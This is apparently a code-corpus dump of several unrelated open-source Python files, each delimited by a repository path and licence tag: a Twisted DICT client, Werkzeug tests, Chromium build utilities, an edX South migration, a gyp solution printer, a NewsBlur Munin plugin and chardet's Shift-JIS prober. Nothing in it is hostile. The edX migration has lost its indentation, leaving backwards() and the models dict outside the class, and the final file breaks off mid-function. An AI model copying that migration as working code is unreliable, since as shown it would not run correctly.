        assert self.state == "ready", "DictClient.sendDefine called when not in ready state"
        self.result = None  # these two are just in case. In "ready" state, result and data
        self.data = None    # should be None
        self.state = "define"
        command = "DEFINE %s %s" % (makeAtom(database.encode("UTF-8")), makeWord(word.encode("UTF-8")))
        self.sendLine(command)

    def sendMatch(self, database, strategy, word):
        """Send a dict MATCH command"""
        assert self.state == "ready", "DictClient.sendMatch called when not in ready state"
        self.result = None
        self.data = None
        self.state = "match"
        command = "MATCH %s %s %s" % (makeAtom(database), makeAtom(strategy), makeAtom(word))
        self.sendLine(command.encode("UTF-8"))

    def dictCode_550_define(self, line):
        """Invalid database"""
        self.mode = "ready"
        self.defineFailed("Invalid database")

    def dictCode_550_match(self, line):
        """Invalid database"""
        self.mode = "ready"
        self.matchFailed("Invalid database")

    def dictCode_551_match(self, line):
        """Invalid strategy"""
        self.mode = "ready"
        self.matchFailed("Invalid strategy")

    def dictCode_552_define(self, line):
        """No match"""
        self.mode = "ready"
        self.defineFailed("No match")

    def dictCode_552_match(self, line):
        """No match"""
        self.mode = "ready"
        self.matchFailed("No match")

    def dictCode_150_define(self, line):
        """n definitions retrieved"""
        self.result = []

    def dictCode_151_define(self, line):
        """Definition text follows"""
        self.mode = "text"
        (word, line) = parseParam(line)
        (db, line) = parseParam(line)
        (dbdesc, line) = parseParam(line)
        if not (word and db and dbdesc):
            self.protocolError("Invalid server response")
            self.transport.loseConnection()
        else:
            self.result.append(Definition(word, db, dbdesc, []))
            self.data = []

    def dictCode_152_match(self, line):
        """n matches found, text follows"""
        self.mode = "text"
        self.result = []
        self.data = []

    def dictCode_text_define(self, line):
        """A line of definition text received"""
        res = parseText(line)
        if res == None:
            # End-of-body marker: attach the accumulated lines to the
            # most recent Definition.
            self.mode = "command"
            self.result[-1].text = self.data
            self.data = None
        else:
            self.data.append(line)

    def dictCode_text_match(self, line):
        """One line of match text received"""
        def l(s):
            # Split a match line into its (database, word) pair.
            p1, t = parseParam(s)
            p2, t = parseParam(t)
            return (p1, p2)
        res = parseText(line)
        if res == None:
            self.mode = "command"
            self.result = map(l, self.data)
            self.data = None
        else:
            self.data.append(line)

    def dictCode_250_define(self, line):
        """ok"""
        t = self.result
        self.result = None
        self.state = "ready"
        self.defineDone(t)

    def dictCode_250_match(self, line):
        """ok"""
        t = self.result
        self.result = None
        self.state = "ready"
        self.matchDone(t)

    def protocolError(self, reason):
        """override to catch unexpected dict protocol conditions"""
        pass

    def dictConnected(self):
        """override to be notified when the server is ready to accept commands"""
        pass

    def defineFailed(self, reason):
        """override to catch reasonable failure responses to DEFINE"""
        pass

    def defineDone(self, result):
        """override to catch successful DEFINE"""
        pass

    def matchFailed(self, reason):
        """override to catch reasonable failure responses to MATCH"""
        pass

    def matchDone(self, result):
        """override to catch successful MATCH"""
        pass
class InvalidResponse(Exception):
    """Raised (via a Deferred errback) when the server sends a reply the
    client cannot interpret."""
    pass
class DictLookup(DictClient):
    """Utility class for a single dict transaction. To be used with DictLookupFactory"""

    def protocolError(self, reason):
        # Only errback if the transaction has not already completed.
        if not self.factory.done:
            self.factory.d.errback(InvalidResponse(reason))
            self.factory.clientDone()

    def dictConnected(self):
        # Bug/portability fix: the apply() builtin (removed in Python 3)
        # was replaced with equivalent argument unpacking.
        if self.factory.queryType == "define":
            self.sendDefine(*self.factory.param)
        elif self.factory.queryType == "match":
            self.sendMatch(*self.factory.param)

    def defineFailed(self, reason):
        # An expected failure (e.g. no match) yields an empty result list.
        self.factory.d.callback([])
        self.factory.clientDone()
        self.transport.loseConnection()

    def defineDone(self, result):
        self.factory.d.callback(result)
        self.factory.clientDone()
        self.transport.loseConnection()

    def matchFailed(self, reason):
        self.factory.d.callback([])
        self.factory.clientDone()
        self.transport.loseConnection()

    def matchDone(self, result):
        self.factory.d.callback(result)
        self.factory.clientDone()
        self.transport.loseConnection()
class DictLookupFactory(protocol.ClientFactory):
    """Utility factory for a single dict transaction"""
    protocol = DictLookup
    done = None

    def __init__(self, queryType, param, d):
        # queryType is "define" or "match"; param is the argument tuple
        # forwarded to the matching DictClient send method; d is the
        # Deferred fired with the transaction's outcome.
        self.queryType = queryType
        self.param = param
        self.d = d
        self.done = 0

    def clientDone(self):
        """Called by client when done."""
        self.done = 1
        del self.d

    def clientConnectionFailed(self, connector, error):
        # Connection never established: fail the caller's Deferred.
        self.d.errback(error)

    def clientConnectionLost(self, connector, error):
        # Only an error if the transaction had not already completed.
        if not self.done:
            self.d.errback(error)

    def buildProtocol(self, addr):
        p = self.protocol()
        p.factory = self
        return p
def define(host, port, database, word):
    """Look up a word using a dict server"""
    # Returns a Deferred that fires with the lookup result (or an empty
    # list on an expected failure such as "no match").
    d = defer.Deferred()
    factory = DictLookupFactory("define", (database, word), d)

    # Imported here rather than at module level so importing this module
    # does not force a reactor to be installed.
    from twisted.internet import reactor
    reactor.connectTCP(host, port, factory)
    return d
def match(host, port, database, strategy, word):
    """Match a word using a dict server"""
    # Returns a Deferred that fires with the (database, word) match pairs
    # (or an empty list on an expected failure such as "no match").
    d = defer.Deferred()
    factory = DictLookupFactory("match", (database, strategy, word), d)

    # Imported here rather than at module level so importing this module
    # does not force a reactor to be installed.
    from twisted.internet import reactor
    reactor.connectTCP(host, port, factory)
    return d
| mit |
nzavagli/UnrealPy | UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/Werkzeug-0.10.4/tests/test_internal.py | 2 | 2492 | # -*- coding: utf-8 -*-
"""
tests.internal
~~~~~~~~~~~~~~
Internal tests.
:copyright: (c) 2014 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import pytest
from datetime import datetime
from warnings import filterwarnings, resetwarnings
from werkzeug.wrappers import Request, Response
from werkzeug import _internal as internal
from werkzeug.test import create_environ
def test_date_to_unix():
    """_date_to_unix converts naive datetimes to Unix timestamps."""
    epoch = datetime(1970, 1, 1)
    assert internal._date_to_unix(epoch) == 0
    assert internal._date_to_unix(datetime(1970, 1, 1, 1, 0, 0)) == 3600
    assert internal._date_to_unix(datetime(1970, 1, 1, 1, 1, 1)) == 3661
    assert internal._date_to_unix(datetime(2010, 2, 15, 16, 15, 39)) == 1266250539
def test_easteregg():
    """The hidden _easteregg page renders the About Werkzeug blurb."""
    request = Request.from_values('/?macgybarchakku')
    response = Response.force_type(internal._easteregg(None), request)
    body = response.get_data()
    assert b'About Werkzeug' in body
    assert b'the Swiss Army knife of Python web development' in body
def test_wrapper_internals():
    """Exercise assorted Request/Response internals: form loading, reprs,
    Content-Length handling, and internal warnings."""
    req = Request.from_values(data={'foo': 'bar'}, method='POST')
    req._load_form_data()
    assert req.form.to_dict() == {'foo': 'bar'}

    # second call does not break
    req._load_form_data()
    assert req.form.to_dict() == {'foo': 'bar'}

    # check reprs
    assert repr(req) == "<Request 'http://localhost/' [POST]>"
    resp = Response()
    assert repr(resp) == '<Response 0 bytes [200 OK]>'
    resp.set_data('Hello World!')
    assert repr(resp) == '<Response 12 bytes [200 OK]>'
    resp.response = iter(['Test'])
    assert repr(resp) == '<Response streamed [200 OK]>'

    # unicode data does not set content length
    response = Response([u'Hällo Wörld'])
    headers = response.get_wsgi_headers(create_environ())
    assert u'Content-Length' not in headers

    # ...but encoded bytes do.
    response = Response([u'Hällo Wörld'.encode('utf-8')])
    headers = response.get_wsgi_headers(create_environ())
    assert u'Content-Length' in headers

    # check for internal warnings: assigning a bare string (instead of an
    # iterable of strings) to response.response must warn when iterated.
    filterwarnings('error', category=Warning)
    response = Response()
    environ = create_environ()
    response.response = 'What the...?'
    pytest.raises(Warning, lambda: list(response.iter_encoded()))
    pytest.raises(Warning, lambda: list(response.get_app_iter(environ)))
    response.direct_passthrough = True
    pytest.raises(Warning, lambda: list(response.iter_encoded()))
    pytest.raises(Warning, lambda: list(response.get_app_iter(environ)))
    # restore the global warning filters changed above
    resetwarnings()
| mit |
was4444/chromium.src | infra/scripts/legacy/scripts/common/chromium_utils.py | 30 | 2152 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Set of basic operations/utilities that are used by the build. """
from contextlib import contextmanager
import ast
import cStringIO
import copy
import errno
import fnmatch
import glob
import json
import os
import re
import shutil
import socket
import stat
import subprocess
import sys
import threading
import time
import traceback
BUILD_DIR = os.path.realpath(os.path.join(
os.path.dirname(__file__), os.pardir, os.pardir))
# Local errors.
class MissingArgument(Exception):
    """A required argument was not supplied."""
    pass
class PathNotFound(Exception):
    """An expected file or directory path could not be found."""
    pass
class ExternalError(Exception):
    """An external command or service failed."""
    pass
def IsWindows():
    """Return True when running on Windows (including Cygwin)."""
    platform = sys.platform
    return platform == 'cygwin' or platform.startswith('win')
def IsLinux():
    """Return True when running on Linux."""
    return sys.platform[:5] == 'linux'
def IsMac():
    """Return True when running on macOS."""
    return sys.platform[:6] == 'darwin'
def convert_json(option, _, value, parser):
    """Provide an OptionParser callback to unmarshal a JSON string."""
    parsed = json.loads(value)
    setattr(parser.values, option.dest, parsed)
def AddPropertiesOptions(option_parser):
    """Registers command line options for parsing build and factory properties.

    After parsing, the options object will have the 'build_properties' and
    'factory_properties' attributes. The corresponding values will be python
    dictionaries containing the properties. If the options are not given on
    the command line, the dictionaries will be empty.

    Args:
      option_parser: An optparse.OptionParser to register command line options
                     for build and factory properties.
    """
    # Both options share identical plumbing; only the flag and its help
    # text differ ('--xxx-properties' auto-derives dest 'xxx_properties').
    for flag, kind in (('--build-properties', 'build'),
                       ('--factory-properties', 'factory')):
        option_parser.add_option(flag, action='callback',
                                 callback=convert_json, type='string',
                                 nargs=1, default={},
                                 help='%s properties in JSON format' % kind)
| bsd-3-clause |
SivilTaram/edx-platform | common/djangoapps/student/migrations/0040_auto__del_field_usersignupsource_user_id__add_field_usersignupsource_u.py | 114 | 12942 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply the migration: swap the user_id FK column for a user FK."""
        # Deleting field 'UserSignupSource.user_id'
        # (South appends '_id' to FK field names, hence 'user_id_id'.)
        db.delete_column('student_usersignupsource', 'user_id_id')

        # Adding field 'UserSignupSource.user'
        db.add_column('student_usersignupsource', 'user',
                      self.gf('django.db.models.fields.related.ForeignKey')(default=0, to=orm['auth.User']),
                      keep_default=False)
def backwards(self, orm):
# User chose to not deal with backwards NULL issues for 'UserSignupSource.user_id'
raise RuntimeError("Cannot reverse this migration. 'UserSignupSource.user_id' and its values cannot be restored.")
# Deleting field 'UserSignupSource.user'
db.delete_column('student_usersignupsource', 'user_id')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'student.anonymoususerid': {
'Meta': {'object_name': 'AnonymousUserId'},
'anonymous_user_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseaccessrole': {
'Meta': {'unique_together': "(('user', 'org', 'course_id', 'role'),)", 'object_name': 'CourseAccessRole'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'org': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '64', 'blank': 'True'}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.courseenrollmentallowed': {
'Meta': {'unique_together': "(('email', 'course_id'),)", 'object_name': 'CourseEnrollmentAllowed'},
'auto_enroll': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'student.loginfailures': {
'Meta': {'object_name': 'LoginFailures'},
'failure_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lockout_until': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.passwordhistory': {
'Meta': {'object_name': 'PasswordHistory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'time_set': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.pendingemailchange': {
'Meta': {'object_name': 'PendingEmailChange'},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_email': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.pendingnamechange': {
'Meta': {'object_name': 'PendingNameChange'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'rationale': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.registration': {
'Meta': {'object_name': 'Registration', 'db_table': "'auth_registration'"},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.userprofile': {
'Meta': {'object_name': 'UserProfile', 'db_table': "'auth_userprofile'"},
'allow_certificate': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'city': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'courseware': ('django.db.models.fields.CharField', [], {'default': "'course.xml'", 'max_length': '255', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
'goals': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'level_of_education': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'mailing_address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"}),
'year_of_birth': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'})
},
'student.usersignupsource': {
'Meta': {'object_name': 'UserSignupSource'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.userstanding': {
'Meta': {'object_name': 'UserStanding'},
'account_status': ('django.db.models.fields.CharField', [], {'max_length': '31', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'standing_last_changed_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'standing'", 'unique': 'True', 'to': "orm['auth.User']"})
},
'student.usertestgroup': {
'Meta': {'object_name': 'UserTestGroup'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'db_index': 'True', 'symmetrical': 'False'})
}
}
complete_apps = ['student']
| agpl-3.0 |
enclose-io/compiler | lts/deps/npm/node_modules/node-gyp/gyp/tools/pretty_sln.py | 11 | 5161 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Prints the information in a sln file in a diffable way.
It first outputs each projects in alphabetical order with their
dependencies.
Then it outputs a possible build order.
"""
from __future__ import print_function
import os
import re
import sys
import pretty_vcproj
__author__ = 'nsylvain (Nicolas Sylvain)'
def BuildProject(project, built, projects, deps, _visiting=None):
  """Print |project| after all of its dependencies (post-order walk).

  Each printed project is appended to |built|.  |_visiting| tracks the
  current recursion path so a dependency cycle terminates instead of
  recursing forever (the original was explicitly "not infinite-recursion
  proof"); callers never need to pass it.
  """
  if project in built:
    return
  if _visiting is None:
    _visiting = set()
  if project in _visiting:
    # Dependency cycle: stop descending; an ancestor call on the stack
    # will print this project.
    return
  _visiting.add(project)
  for dep in deps[project]:
    if dep not in built:
      BuildProject(dep, built, projects, deps, _visiting)
  print(project)
  built.append(project)
def ParseSolution(solution_file):
  """Parse a Visual Studio .sln file.

  Returns (projects, dependencies):
    projects: maps project name (with '_gyp' stripped) to
              [stripped path, clsid, original path].
    dependencies: maps project name to the sorted names of the projects it
                  depends on (clsids resolved to names).
  """
  # All projects, their clsid and paths.
  projects = dict()
  # A list of dependencies associated with a project.
  dependencies = dict()
  # Regular expressions that matches the SLN format.
  # The first line of a project definition.
  begin_project = re.compile(r'^Project\("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942'
                             r'}"\) = "(.*)", "(.*)", "(.*)"$')
  # The last line of a project definition.
  end_project = re.compile('^EndProject$')
  # The first line of a dependency list.
  begin_dep = re.compile(
      r'ProjectSection\(ProjectDependencies\) = postProject$')
  # The last line of a dependency list.
  end_dep = re.compile('EndProjectSection$')
  # A line describing a dependency.
  dep_line = re.compile(' *({.*}) = ({.*})$')
  in_deps = False
  # Initialized so a stray dependency line before any project is ignored
  # instead of raising NameError.
  current_project = None
  # 'with' closes the file deterministically (the original leaked the handle).
  with open(solution_file) as solution:
    for line in solution:
      results = begin_project.search(line)
      if results:
        # Hack to remove icu because the diff is too different.
        if results.group(1).find('icu') != -1:
          continue
        # We remove "_gyp" from the names because it helps to diff them.
        current_project = results.group(1).replace('_gyp', '')
        projects[current_project] = [results.group(2).replace('_gyp', ''),
                                     results.group(3),
                                     results.group(2)]
        dependencies[current_project] = []
        continue
      results = end_project.search(line)
      if results:
        current_project = None
        continue
      results = begin_dep.search(line)
      if results:
        in_deps = True
        continue
      results = end_dep.search(line)
      if results:
        in_deps = False
        continue
      results = dep_line.search(line)
      if results and in_deps and current_project:
        dependencies[current_project].append(results.group(1))
        continue
  # Change all dependencies clsid to name instead.
  for project in dependencies:
    # For each dependencies in this project
    new_dep_array = []
    for dep in dependencies[project]:
      # Look for the project name matching this clsid
      for project_info in projects:
        if projects[project_info][1] == dep:
          new_dep_array.append(project_info)
    dependencies[project] = sorted(new_dep_array)
  return (projects, dependencies)
def PrintDependencies(projects, deps):
  """Print every project's path and dependency list, sorted by name."""
  banner = "---------------------------------------"
  print(banner)
  print("Dependencies for all projects")
  print(banner)
  print("-- --")
  for project, dep_list in sorted(deps.items()):
    print("Project : %s" % project)
    print("Path : %s" % projects[project][0])
    if not dep_list:
      continue
    for dep in dep_list:
      print(" - %s" % dep)
    print("")
  print("-- --")
def PrintBuildOrder(projects, deps):
  """Print one dependency-respecting build order covering all projects."""
  banner = "---------------------------------------"
  print(banner)
  print("Build order ")
  print(banner)
  print("-- --")
  done = []
  for project in sorted(deps):
    if project not in done:
      BuildProject(project, done, projects, deps)
  print("-- --")
def PrintVCProj(projects):
  """Run pretty_vcproj.main() on every project's .vcproj file.

  Relies on sys.argv[1] being the solution path: project paths from the
  .sln are resolved relative to the solution's directory.  Any extra
  command-line arguments (sys.argv[3:]) are forwarded to pretty_vcproj.
  """
  for project in projects:
    print("-------------------------------------")
    print("-------------------------------------")
    print(project)
    print(project)
    print(project)
    print("-------------------------------------")
    print("-------------------------------------")
    # projects[project][2] is the original (un-stripped) project path.
    project_path = os.path.abspath(os.path.join(os.path.dirname(sys.argv[1]),
                                                projects[project][2]))
    pretty = pretty_vcproj
    argv = [ '',
             project_path,
             '$(SolutionDir)=%s\\' % os.path.dirname(sys.argv[1]),
           ]
    argv.extend(sys.argv[3:])
    pretty.main(argv)
def main():
  """Entry point: parse the .sln named on the command line and report it."""
  # At least the solution path must be supplied.
  if len(sys.argv) < 2:
    print('Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0])
    return 1
  projects, deps = ParseSolution(sys.argv[1])
  PrintDependencies(projects, deps)
  PrintBuildOrder(projects, deps)
  if '--recursive' in sys.argv:
    PrintVCProj(projects)
  return 0
# Script entry point: propagate main()'s status code to the shell.
if __name__ == '__main__':
  sys.exit(main())
| mit |
lucidbard/NewsBlur | utils/munin/newsblur_users.py | 14 | 1259 | #!/usr/bin/env python
from utils.munin.base import MuninGraph
class NBMuninGraph(MuninGraph):
    """Munin plugin graphing NewsBlur user counts:
    all / monthly-active / daily-active / premium / queued."""
    @property
    def graph_config(self):
        """Munin 'config' output: graph metadata plus a label per series."""
        return {
            'graph_category' : 'NewsBlur',
            'graph_title' : 'NewsBlur Users',
            'graph_vlabel' : 'users',
            'graph_args' : '-l 0',
            'all.label': 'all',
            'monthly.label': 'monthly',
            'daily.label': 'daily',
            'premium.label': 'premium',
            'queued.label': 'queued',
        }
    def calculate_metrics(self):
        """Return the current value for every series declared in graph_config."""
        # Imports are local to the method — presumably to defer Django/app
        # setup until metrics are actually fetched; confirm before moving.
        import datetime
        from django.contrib.auth.models import User
        from apps.profile.models import Profile, RNewUserQueue
        # "monthly"/"daily" count profiles seen within the trailing window.
        last_month = datetime.datetime.utcnow() - datetime.timedelta(days=30)
        last_day = datetime.datetime.utcnow() - datetime.timedelta(minutes=60*24)
        return {
            'all': User.objects.count(),
            'monthly': Profile.objects.filter(last_seen_on__gte=last_month).count(),
            'daily': Profile.objects.filter(last_seen_on__gte=last_day).count(),
            'premium': Profile.objects.filter(is_premium=True).count(),
            'queued': RNewUserQueue.user_count(),
        }
# Munin invokes the plugin as a script; run() dispatches config/fetch modes.
if __name__ == '__main__':
    NBMuninGraph().run()
| mit |
vebin/Wox | PythonHome/Lib/site-packages/chardet/sjisprober.py | 1777 | 3764 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import SJISDistributionAnalysis
from .jpcntx import SJISContextAnalysis
from .mbcssm import SJISSMModel
from . import constants
class SJISProber(MultiByteCharSetProber):
    """Probes a byte stream for the Shift-JIS Japanese encoding, combining a
    coding state machine with distribution and context analyses."""
    def __init__(self):
        MultiByteCharSetProber.__init__(self)
        self._mCodingSM = CodingStateMachine(SJISSMModel)
        self._mDistributionAnalyzer = SJISDistributionAnalysis()
        self._mContextAnalyzer = SJISContextAnalysis()
        self.reset()
    def reset(self):
        """Reset base-class state plus the SJIS context analyser."""
        MultiByteCharSetProber.reset(self)
        self._mContextAnalyzer.reset()
    def get_charset_name(self):
        # Delegated: the context analyser decides the exact charset name.
        return self._mContextAnalyzer.get_charset_name()
    def feed(self, aBuf):
        """Feed a chunk of bytes through the state machine and analysers;
        returns the prober's state afterwards."""
        aLen = len(aBuf)
        for i in range(0, aLen):
            codingState = self._mCodingSM.next_state(aBuf[i])
            if codingState == constants.eError:
                if constants._debug:
                    sys.stderr.write(self.get_charset_name()
                                     + ' prober hit error at byte ' + str(i)
                                     + '\n')
                self._mState = constants.eNotMe
                break
            elif codingState == constants.eItsMe:
                self._mState = constants.eFoundIt
                break
            elif codingState == constants.eStart:
                charLen = self._mCodingSM.get_current_charlen()
                if i == 0:
                    # First byte of this chunk completes a character begun in
                    # the previous chunk (carried in self._mLastChar).
                    self._mLastChar[1] = aBuf[0]
                    self._mContextAnalyzer.feed(self._mLastChar[2 - charLen:],
                                                charLen)
                    self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
                else:
                    self._mContextAnalyzer.feed(aBuf[i + 1 - charLen:i + 3
                                                     - charLen], charLen)
                    self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
                                                     charLen)
        # Remember the last byte for cross-chunk character assembly.
        self._mLastChar[0] = aBuf[aLen - 1]
        if self.get_state() == constants.eDetecting:
            # Shortcut: declare success early once confidence is high enough.
            if (self._mContextAnalyzer.got_enough_data() and
                    (self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
                self._mState = constants.eFoundIt
        return self.get_state()
    def get_confidence(self):
        # Overall confidence is the max of the two analysers' confidences.
        contxtCf = self._mContextAnalyzer.get_confidence()
